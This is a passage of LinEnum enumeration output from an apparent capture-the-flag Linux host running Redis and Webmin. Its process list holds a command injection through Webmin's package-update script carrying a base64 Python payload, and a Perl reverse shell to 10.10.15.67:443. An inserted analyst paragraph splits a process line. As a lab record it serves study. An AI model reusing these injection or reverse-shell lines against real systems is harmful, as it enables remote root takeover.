Wed 2019-11-20 18:00:00 GMT  11h left      Wed 2019-11-20 06:33:43 GMT  17min ago     apt-daily.timer               apt-daily.service
Thu 2019-11-21 06:16:03 GMT  23h left      Wed 2019-11-20 06:33:43 GMT  17min ago     apt-daily-upgrade.timer       apt-daily-upgrade.service
Thu 2019-11-21 06:48:50 GMT  23h left      Wed 2019-11-20 06:48:50 GMT  2min 34s ago  systemd-tmpfiles-clean.timer  systemd-tmpfiles-clean.service
Mon 2019-11-25 00:00:00 GMT  4 days left   Wed 2019-11-20 06:33:43 GMT  17min ago     fstrim.timer                  fstrim.service

6 timers listed.
Enable thorough tests to see inactive timers

### NETWORKING
#######################################
[-] Network and IP info:
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.160  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:febd:5342  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:febd:5342  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:bd:53:42  txqueuelen 1000  (Ethernet)
        RX packets 95573  bytes 8588335 (8.5 MB)
        RX errors 7  dropped 10  overruns 0  frame 0
        TX packets 93836  bytes 21317325 (21.3 MB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
        device interrupt 19  base 0x2000

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 3206  bytes 231248 (231.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3206  bytes 231248 (231.2 KB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

[-] ARP history:
_gateway (10.10.10.2) at 00:50:56:bd:e2:c6 [ether] on ens33

[-] Nameserver(s):
nameserver 127.0.0.53

[-] Nameserver(s):
Global
DNSSEC NTA: 10.in-addr.arpa
            16.172.in-addr.arpa
            168.192.in-addr.arpa
            17.172.in-addr.arpa
            18.172.in-addr.arpa
            19.172.in-addr.arpa
            20.172.in-addr.arpa
            21.172.in-addr.arpa
            22.172.in-addr.arpa
            23.172.in-addr.arpa
            24.172.in-addr.arpa
            25.172.in-addr.arpa
            26.172.in-addr.arpa
            27.172.in-addr.arpa
            28.172.in-addr.arpa
            29.172.in-addr.arpa
            30.172.in-addr.arpa
            31.172.in-addr.arpa
            corp
            d.f.ip6.arpa
            home
            internal
            intranet
            lan
            local
            private
            test

Link 2 (ens33)
      Current Scopes: none
       LLMNR setting: yes
MulticastDNS setting: no
      DNSSEC setting: no
    DNSSEC supported: no

[-] Default route:
default         _gateway        0.0.0.0         UG    0      0        0 ens33

[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:6379            0.0.0.0:*               LISTEN      585/redis-server 0.
tcp        0      0 0.0.0.0:10000           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 ::1:6379                :::*                    LISTEN      585/redis-server 0.
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -

[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 0.0.0.0:10000           0.0.0.0:*                           -
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -


### SERVICES
#######################################
[-] Running processes:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.1  0.7 159396  7160 ?        Ss   06:33   0:02 /sbin/init splash
root         2  0.0  0.0      0     0 ?        S    06:33   0:00 [kthreadd]
root         4  0.0  0.0      0     0 ?        I<   06:33   0:00 [kworker/0:0H]
root         6  0.0  0.0      0     0 ?        I<   06:33   0:00 [mm_percpu_wq]
root         7  0.0  0.0      0     0 ?        S    06:33   0:00 [ksoftirqd/0]
root         8  0.0  0.0      0     0 ?        I    06:33   0:00 [rcu_sched]
root         9  0.0  0.0      0     0 ?        I    06:33   0:00 [rcu_bh]
root        10  0.0  0.0      0     0 ?        S    06:33   0:00 [migration/0]
root        11  0.0  0.0      0     0 ?        S    06:33   0:00 [watchdog/0]
root        12  0.0  0.0      0     0 ?        S    06:33   0:00 [cpuhp/0]
root        13  0.0  0.0      0     0 ?        S    06:33   0:00 [kdevtmpfs]
root        14  0.0  0.0      0     0 ?        I<   06:33   0:00 [netns]
root        15  0.0  0.0      0     0 ?        S    06:33   0:00 [rcu_tasks_kthre]
root        16  0.0  0.0      0     0 ?        S    06:33   0:00 [kauditd]
root        17  0.0  0.0      0     0 ?        S    06:33   0:00 [khungtaskd]
root        18  0.0  0.0      0     0 ?        S    06:33   0:00 [oom_reaper]
root        19  0.0  0.0      0     0 ?        I<   06:33   0:00 [writeback]
root        20  0.0  0.0      0     0 ?        S    06:33   0:00 [kcompactd0]
root        21  0.0  0.0      0     0 ?        SN   06:33   0:00 [ksmd]
root        22  0.0  0.0      0     0 ?        SN   06:33   0:00 [khugepaged]
root        23  0.0  0.0      0     0 ?        I<   06:33   0:00 [crypto]
root        24  0.0  0.0      0     0 ?        I<   06:33   0:00 [kintegrityd]
root        25  0.0  0.0      0     0 ?        I<   06:33   0:00 [kblockd]
root        26  0.0  0.0      0     0 ?        I<   06:33   0:00 [ata_sff]
root        27  0.0  0.0      0     0 ?        I<   06:33   0:00 [md]
root        28  0.0  0.0      0     0 ?        I<   06:33   0:00 [edac-poller]
root        29  0.0  0.0      0     0 ?        I<   06:33   0:00 [devfreq_wq]
root        30  0.0  0.0      0     0 ?        I<   06:33   0:00 [watchdogd]
root        32  0.0  0.0      0     0 ?        I    06:33   0:00 [kworker/0:1]
root        34  0.0  0.0      0     0 ?        S    06:33   0:00 [kswapd0]
root        35  0.0  0.0      0     0 ?        I<   06:33   0:00 [kworker/u257:0]
root        36  0.0  0.0      0     0 ?        S    06:33   0:00 [ecryptfs-kthrea]
root        78  0.0  0.0      0     0 ?        I<   06:33   0:00 [kthrotld]
root        79  0.0  0.0      0     0 ?        I<   06:33   0:00 [acpi_thermal_pm]
root        80  0.0  0.0      0     0 ?        S    06:33   0:00 [scsi_eh_0]
root        81  0.0  0.0      0     0 ?        I<   06:33   0:00 [scsi_tmf_0]
root        82  0.0  0.0      0     0 ?        S    06:33   0:00 [scsi_eh_1]
root        83  0.0  0.0      0     0 ?        I<   06:33   0:00 [scsi_tmf_1]
root        85  0.0  0.0      0     0 ?        I    06:33   0:00 [kworker/0:2]
root        90  0.0  0.0      0     0 ?        I<   06:33   0:00 [ipv6_addrconf]
root        99  0.0  0.0      0     0 ?        I<   06:33   0:00 [kstrp]
root       116  0.0  0.0      0     0 ?        I<   06:33   0:00 [charger_manager]
root       117  0.0  0.0      0     0 ?        I    06:33   0:00 [kworker/u256:4]
root       169  0.0  0.0      0     0 ?        I<   06:33   0:00 [mpt_poll_0]
root       170  0.0  0.0      0     0 ?        I<   06:33   0:00 [mpt/0]
root       172  0.0  0.0      0     0 ?        I<   06:33   0:00 [kworker/0:1H]
root       173  0.0  0.0      0     0 ?        S    06:33   0:00 [scsi_eh_2]
root       174  0.0  0.0      0     0 ?        I<   06:33   0:00 [scsi_tmf_2]
root       195  0.0  0.0      0     0 ?        S    06:33   0:00 [jbd2/sda1-8]
root       196  0.0  0.0      0     0 ?        I<   06:33   0:00 [ext4-rsv-conver]
root       240  0.0  0.8  78460  8240 ?        S<s  06:33   0:00 /lib/systemd/systemd-journald
root       251  0.0  0.4  45196  3756 ?        Ss   06:33   0:00 /lib/systemd/systemd-udevd
systemd+   329  0.0  0.3  70628  3320 ?        Ss   06:33   0:00 /lib/systemd/systemd-resolved
systemd+   331  0.0  0.2 141928  1848 ?        Ssl  06:33   0:00 /lib/systemd/systemd-timesyncd
root       332  0.0  1.2 170344 11096 ?        Ssl  06:33   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
syslog     339  0.0  0.4 263036  4024 ?        Ssl  06:33   0:00 /usr/sbin/rsyslogd -n
root       340  0.0  0.5 289844  4684 ?        Ssl  06:33   0:00 /usr/lib/accountsservice/accounts-daemon
root       344  0.0  0.2  31320  2700 ?        Ss   06:33   0:00 /usr/sbin/cron -f
root       347  0.0  0.5  70608  4876 ?        Ss   06:33   0:00 /lib/systemd/systemd-logind
message+   350  0.0  0.4  50040  4124 ?        Ss   06:33   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root       435  0.0  0.0      0     0 ?        I<   06:33   0:00 [ttm_swap]
root       437  0.0  0.0      0     0 ?        S    06:33   0:00 [irq/16-vmwgfx]
root       566  0.0  0.6  72296  6180 ?        Ss   06:33   0:00 /usr/sbin/sshd -D
root       578  0.0  0.1  16180  1736 tty1     Ss+  06:33   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
redis      585  0.0  0.4  51572  4140 ?        Ssl  06:33   0:00 /usr/bin/redis-server 0.0.0.0:6379
root       595  0.0  1.7 331332 15900 ?        Ss   06:33   0:00 /usr/sbin/apache2 -k start
www-data   597  0.0  1.1 335848 10244 ?        S    06:33   0:00 /usr/sbin/apache2 -k start
www-data   598  0.0  1.1 335872 10372 ?        S    06:33   0:00 /usr/sbin/apache2 -k start
www-data   599  0.0  1.1 335840 10240 ?        S    06:33   0:00 /usr/sbin/apache2 -k start
www-data   602  0.0  1.1 335872 10376 ?        S    06:33   0:00 /usr/sbin/apache2 -k start
root       676  0.1  3.2  95308 29640 ?        Ss   06:33   0:01 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
www-data  1229  0.0  1.1 335800 10172 ?        S    06:35   0:00 /usr/sbin/apache2 -k start
www-data  1258  0.0  1.1 335856 10356 ?        S    06:35   0:00 /usr/sbin/apache2 -k start
www-data  1950  0.0  1.1 335856 10360 ?        S    06:38   0:00 /usr/sbin/apache2 -k start
www-data  2059  0.0  1.1 335856 10352 ?        S    06:38   0:00 /usr/sbin/apache2 -k start
root      2281  0.0  0.0      0     0 ?        I    06:38   0:00 [kworker/u256:0]
www-data  2618  0.0  1.1 335800 10176 ?        S    06:40   0:00 /usr/sbin/apache2 -k start
root      3022  0.0  0.0      0     0 ?        I    06:44   0:00 [kworker/u256:1]
www-data  3307  0.0  1.1 335792 10164 ?        S    06:47   0:00 /usr/sbin/apache2 -k start
root      3380  0.0  0.7 107988  7000 ?        Ss   06:48   0:00 sshd: redis [priv]
redis     3385  0.0  0.8  76616  7368 ?        Ss   06:48   0:00 /lib/systemd/systemd --user
redis     3386  0.0  0.2 193380  2156 ?        S    06:48   0:00 (sd-pam)
redis     3434  0.0  0.4 108096  4492 ?        S    06:48   0:00 sshd: redis@pts/0
redis     3439  0.0  0.5  22484  4992 pts/0    Ss   06:48   0:00 -bash
root      3486  0.0  5.1 118884 47068 ?        S    06:49   0:00 /usr/share/webmin/package-updates/update.cgi
root      3493  0.0  0.0   4628   780 ?        S    06:49   0:00 sh -c apt-get -y install apt ;python -c "import base64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdWJwc </tmp/.webmin/535820_3486_2_update.cgi 2>&1
root      3503  0.0  0.9  33400  9120 ?        S    06:49   0:00 python -c import base64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdWJwc
root      3504  0.0  0.0   4628   816 ?        S    06:49   0:00 /bin/sh -i
root      3616  0.2  5.1 118892 47064 ?        S    06:50   0:00 /usr/share/webmin/package-updates/update.cgi
root      3636  0.0  3.2  95308 29884 ?        S    06:50   0:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
root      3671  0.0  0.0      0     0 ?        Z    06:50   0:00 [sh] <defunct>
root      3689  0.0  0.7  28772  6628 ?        S    06:50   0:00 perl -MIO -e $p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.15.67:443");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};
root      3718  0.0  3.4  97744 31592 ?        S    06:51   0:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
redis     3737  0.0  0.4  13676  4036 pts/0    S+   06:51   0:00 /bin/bash ./LinEnum.sh
redis     3738  0.1  0.3  13808  2980 pts/0    S+   06:51   0:00 /bin/bash ./LinEnum.sh
redis     3739  0.0  0.0   7476   748 pts/0    S+   06:51   0:00 tee -a
root      3742  0.0  0.7  33084  7040 ?        S    06:51   0:00 python -c import pty; pty.spawn("/bin/bash")
root      3743  0.0  0.3  18640  3524 pts/1    Ss+  06:51   0:00 /bin/bash
root      3919  0.0  3.2  95308 29948 ?        S    06:51   0:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/

Worth reading closely in this listing: redis-server (pid 585) is bound to 0.0.0.0:6379, and Webmin's package-updates/update.cgi (pid 3486, running as root) has spawned `sh -c apt-get -y install apt ;python -c ...` with a second command chained after the package name, whose output is redirected into /tmp/.webmin/. Below it sit root-owned shells and reverse-shell one-liners with no controlling terminal (pids 3503, 3504, 3689 connecting back to 10.10.15.67:443, and 3742 spawning a pty), none of which belong to the redis session that is running LinEnum on pts/0.
miniserv.conf
redis 3937 0.0 0.3 13808 2788 pts/0 S+ 06:51
0:00 /bin/bash ./LinEnum.sh
redis 3938 0.0 0.3 39664 3668 pts/0 R+ 06:51
0:00 ps aux

[-] Process binaries and associated permissions (from above list):

1.1M -rwxr-xr-x 1 root root 1.1M Jun 6 23:28 /bin/bash
0 lrwxrwxrwx 1 root root 4 Aug 24 11:25 /bin/sh -> dash
1.6M -rwxr-xr-x 1 root root 1.6M Jul 22 17:45 /lib/systemd/systemd
128K -rwxr-xr-x 1 root root 127K Jul 22 17:45 /lib/systemd/systemd-journald
216K -rwxr-xr-x 1 root root 215K Jul 22 17:45 /lib/systemd/systemd-logind
372K -rwxr-xr-x 1 root root 371K Jul 22 17:45 /lib/systemd/systemd-resolved
40K -rwxr-xr-x 1 root root 39K Jul 22 17:45 /lib/systemd/systemd-timesyncd
572K -rwxr-xr-x 1 root root 571K Jul 22 17:45 /lib/systemd/systemd-udevd
56K -rwxr-xr-x 1 root root 56K Oct 15 2018 /sbin/agetty
0 lrwxrwxrwx 1 root root 20 Jul 22 17:45 /sbin/init -> /lib/systemd/systemd
232K -rwxr-xr-x 1 root root 232K Jun 10 19:05 /usr/bin/dbus-daemon
2.1M -rwxr-xr-x 2 root root 2.1M Nov 19 2018 /usr/bin/perl
0 lrwxrwxrwx 1 root root 9 Oct 25 2018 /usr/bin/python3 -> python3.6
0 lrwxrwxrwx 1 root root 15 Jul 14 20:20 /usr/bin/redis-server -> redis-check-rdb
180K -rwxr-xr-x 1 root root 179K Dec 18 2017 /usr/lib/accountsservice/accounts-daemon
656K -rwxr-xr-x 1 root root 656K Jul 16 19:14 /usr/sbin/apache2
48K -rwxr-xr-x 1 root root 47K Nov 16 2017 /usr/sbin/cron
668K -rwxr-xr-x 1 root root 665K Apr 24 2018 /usr/sbin/rsyslogd
772K -rwxr-xr-x 1 root root 769K Mar 4 2019 /usr/sbin/sshd
8.0K -rwxr-xr-x 1 root root 4.7K May 5 2019 /usr/share/webmin/package-updates/update.cgi

[-] /etc/init.d/ binary permissions:

total 124
drwxr-xr-x 2 root root 4096 Oct 25 16:38 .
drwxr-xr-x 81 root root 4096 Oct 25 16:44 ..
-rwxr-xr-x 1 root root 8181 Jul 16 19:14 apache2
-rwxr-xr-x 1 root root 2489 Jul 16 19:14 apache-htcacheclean
-rwxr-xr-x 1 root root 4335 Mar 22 2018 apparmor
-rwxr-xr-x 1 root root 1232 Apr 19 2018 console-setup.sh
-rwxr-xr-x 1 root root 3049 Nov 16 2017 cron
-rwxr-xr-x 1 root root 2813 Nov 15 2017 dbus
-rwxr-xr-x 1 root root 985 Mar 18 2019 grub-common
-rwxr-xr-x 1 root root 3809 Feb 14 2018 hwclock.sh
-rwxr-xr-x 1 root root 2444 Oct 25 2017 irqbalance
-rwxr-xr-x 1 root root 1479 Feb 15 2018 keyboard-setup.sh
-rwxr-xr-x 1 root root 2044 Aug 15 2017 kmod
-rwxr-xr-x 1 root root 4597 Nov 25 2016 networking
-rwxr-xr-x 1 root root 1366 Apr 4 2019 plymouth
-rwxr-xr-x 1 root root 752 Apr 4 2019 plymouth-log
-rwxr-xr-x 1 root root 1191 Jan 17 2018 procps
-rwxr-xr-x 1 root root 1702 Aug 25 22:08 redis_6379
-rwxr-xr-x 1 root root 1614 Apr 2 2018 redis-server
-rwxr-xr-x 1 root root 4355 Dec 13 2017 rsync
-rwxr-xr-x 1 root root 2864 Jan 14 2018 rsyslog
-rwxr-xr-x 1 root root 3837 Jan 25 2018 ssh
-rwxr-xr-x 1 root root 5974 Apr 20 2018 udev
-rwxr-xr-x 1 root root 2083 Aug 15 2017 ufw
-rwxr-xr-x 1 root root 1306 Oct 15 2018 uuidd
-rwxr-xr-x 1 root root 1853 May 5 2019 webmin

[-] /lib/systemd/* config file permissions:


/lib/systemd/:
total 7.3M
drwxr-xr-x 23 root root 36K Oct 25 16:44 system
drwxr-xr-x 2 root root 4.0K Oct 25 16:44 system-generators
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 system-sleep
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 network
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 system-preset
-rw-r--r-- 1 root root 2.3M Jul 22 17:45 libsystemd-shared-237.so
-rw-r--r-- 1 root root 699 Jul 22 17:45 resolv.conf
-rwxr-xr-x 1 root root 1.3K Jul 22 17:45 set-cpufreq
-rwxr-xr-x 1 root root 1.6M Jul 22 17:45 systemd
-rwxr-xr-x 1 root root 6.0K Jul 22 17:45 systemd-ac-power
-rwxr-xr-x 1 root root 18K Jul 22 17:45 systemd-backlight
-rwxr-xr-x 1 root root 11K Jul 22 17:45 systemd-binfmt
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-cgroups-agent
-rwxr-xr-x 1 root root 22K Jul 22 17:45 systemd-cryptsetup
-rwxr-xr-x 1 root root 15K Jul 22 17:45 systemd-dissect
-rwxr-xr-x 1 root root 18K Jul 22 17:45 systemd-fsck
-rwxr-xr-x 1 root root 23K Jul 22 17:45 systemd-fsckd
-rwxr-xr-x 1 root root 19K Jul 22 17:45 systemd-growfs
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-hibernate-resume
-rwxr-xr-x 1 root root 23K Jul 22 17:45 systemd-hostnamed
-rwxr-xr-x 1 root root 15K Jul 22 17:45 systemd-initctl
-rwxr-xr-x 1 root root 127K Jul 22 17:45 systemd-journald
-rwxr-xr-x 1 root root 35K Jul 22 17:45 systemd-localed
-rwxr-xr-x 1 root root 215K Jul 22 17:45 systemd-logind
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-makefs
-rwxr-xr-x 1 root root 15K Jul 22 17:45 systemd-modules-load
-rwxr-xr-x 1 root root 1.6M Jul 22 17:45 systemd-networkd
-rwxr-xr-x 1 root root 19K Jul 22 17:45 systemd-networkd-wait-online
-rwxr-xr-x 1 root root 11K Jul 22 17:45 systemd-quotacheck
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-random-seed
-rwxr-xr-x 1 root root 15K Jul 22 17:45 systemd-remount-fs
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-reply-password
-rwxr-xr-x 1 root root 371K Jul 22 17:45 systemd-resolved
-rwxr-xr-x 1 root root 19K Jul 22 17:45 systemd-rfkill
-rwxr-xr-x 1 root root 43K Jul 22 17:45 systemd-shutdown
-rwxr-xr-x 1 root root 19K Jul 22 17:45 systemd-sleep
-rwxr-xr-x 1 root root 23K Jul 22 17:45 systemd-socket-proxyd
-rwxr-xr-x 1 root root 11K Jul 22 17:45 systemd-sulogin-shell
-rwxr-xr-x 1 root root 15K Jul 22 17:45 systemd-sysctl
-rwxr-xr-x 1 root root 1.3K Jul 22 17:45 systemd-sysv-install
-rwxr-xr-x 1 root root 27K Jul 22 17:45 systemd-timedated
-rwxr-xr-x 1 root root 39K Jul 22 17:45 systemd-timesyncd
-rwxr-xr-x 1 root root 571K Jul 22 17:45 systemd-udevd
-rwxr-xr-x 1 root root 15K Jul 22 17:45 systemd-update-utmp
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-user-sessions
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-veritysetup
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-volatile-root
drwxr-xr-x 2 root root 4.0K Apr 20 2018 system-shutdown

/lib/systemd/system:
total 844K
-rw-r--r-- 1 root root 1.2K Oct 25 14:10 redis-server.service
drwxr-xr-x 2 root root 4.0K Aug 25 18:24 apache2.service.d
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 halt.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 initrd-switch-root.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 kexec.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 getty.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30
graphical.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 local-fs.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 timers.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 rc-local.service.d
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 user@.service.d
lrwxrwxrwx 1 root root 14 Jul 22 17:45 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 checkroot.service -> /dev/null
-rw-r--r-- 1 root root 1.1K Jul 22 17:45 console-getty.service
-rw-r--r-- 1 root root 1.3K Jul 22 17:45 container-getty@.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root 13 Jul 22 17:45 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root 25 Jul 22 17:45 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root 23 Jul 22 17:45 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root 22 Jul 22 17:45 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root 25 Jul 22 17:45 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Jul 22 17:45 debug-shell.service
lrwxrwxrwx 1 root root 16 Jul 22 17:45 default.target -> graphical.target
-rw-r--r-- 1 root root 797 Jul 22 17:45 emergency.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 fuse.service -> /dev/null
-rw-r--r-- 1 root root 2.0K Jul 22 17:45 getty@.service
-rw-r--r-- 1 root root 342 Jul 22 17:45 getty-static.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 halt.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 hostname.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 hwclock.service -> /dev/null
-rw-r--r-- 1 root root 670 Jul 22 17:45 initrd-cleanup.service
-rw-r--r-- 1 root root 830 Jul 22 17:45 initrd-parse-etc.service
-rw-r--r-- 1 root root 589 Jul 22 17:45 initrd-switch-root.service
-rw-r--r-- 1 root root 704 Jul 22 17:45 initrd-udevadm-cleanup-db.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 killprocs.service -> /dev/null
lrwxrwxrwx 1 root root 28 Jul 22 17:45 kmod.service -> systemd-modules-load.service
-rw-r--r-- 1 root root 717 Jul 22 17:45 kmod-static-nodes.service
lrwxrwxrwx 1 root root 28 Jul 22 17:45 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 motd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 mountall.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 mountnfs.service -> /dev/null
-rw-r--r-- 1 root root 362 Jul 22 17:45 ondemand.service
lrwxrwxrwx 1 root root 22 Jul 22 17:45 procps.service -> systemd-sysctl.service
-rw-r--r-- 1 root root 609 Jul 22 17:45 quotaon.service
-rw-r--r-- 1 root root 716 Jul 22 17:45 rc-local.service
lrwxrwxrwx 1 root root 16 Jul 22 17:45 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 rc.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 rcS.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 reboot.service -> /dev/null
-rw-r--r-- 1 root root 788 Jul 22 17:45 rescue.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root 15 Jul 22 17:45 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root 13 Jul 22 17:45 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root 17 Jul 22 17:45 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root 17 Jul 22 17:45 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root 17 Jul 22 17:45 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root 16 Jul 22 17:45 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root 13 Jul 22 17:45 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root 9 Jul 22 17:45 sendsigs.service -> /dev/null
-rw-r--r-- 1 root root 1.5K Jul 22 17:45 serial-getty@.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 single.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 stop-bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 stop-bootlogd-single.service -> /dev/null
-rw-r--r-- 1 root root 554 Jul 22 17:45 suspend-then-hibernate.target
-rw-r--r-- 1 root root 724 Jul 22 17:45 systemd-ask-password-console.service
-rw-r--r-- 1 root root 752 Jul 22 17:45 systemd-ask-password-wall.service
-rw-r--r-- 1 root root 752 Jul 22 17:45 systemd-backlight@.service
-rw-r--r-- 1 root root 999 Jul 22 17:45 systemd-binfmt.service
-rw-r--r-- 1 root root 537 Jul 22 17:45 systemd-exit.service
-rw-r--r-- 1 root root 551 Jul 22 17:45 systemd-fsckd.service
-rw-r--r-- 1 root root 540 Jul 22 17:45 systemd-fsckd.socket
-rw-r--r-- 1 root root 714 Jul 22 17:45 systemd-fsck-root.service
-rw-r--r-- 1 root root 715 Jul 22 17:45 systemd-fsck@.service
-rw-r--r-- 1 root root 584 Jul 22 17:45 systemd-halt.service
-rw-r--r-- 1 root root 671 Jul 22 17:45 systemd-hibernate-resume@.service
-rw-r--r-- 1 root root 541 Jul 22 17:45 systemd-hibernate.service
-rw-r--r-- 1 root root 1.1K Jul 22 17:45 systemd-hostnamed.service
-rw-r--r-- 1 root root 818 Jul 22 17:45 systemd-hwdb-update.service
-rw-r--r-- 1 root root 559 Jul 22 17:45 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root 551 Jul 22 17:45 systemd-initctl.service
-rw-r--r-- 1 root root 686 Jul 22 17:45 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.6K Jul 22 17:45 systemd-journald.service
-rw-r--r-- 1 root root 771 Jul 22 17:45 systemd-journal-flush.service
-rw-r--r-- 1 root root 597 Jul 22 17:45 systemd-kexec.service
-rw-r--r-- 1 root root 1.1K Jul 22 17:45 systemd-localed.service
-rw-r--r-- 1 root root 1.5K Jul 22 17:45 systemd-logind.service
-rw-r--r-- 1 root root 733 Jul 22 17:45 systemd-machine-id-commit.service
-rw-r--r-- 1 root root 1007 Jul 22 17:45 systemd-modules-load.service
-rw-r--r-- 1 root root 1.9K Jul 22 17:45 systemd-networkd.service
-rw-r--r-- 1 root root 740 Jul 22 17:45 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root 593 Jul 22 17:45 systemd-poweroff.service
-rw-r--r-- 1 root root 655 Jul 22 17:45 systemd-quotacheck.service
-rw-r--r-- 1 root root 792 Jul 22 17:45 systemd-random-seed.service
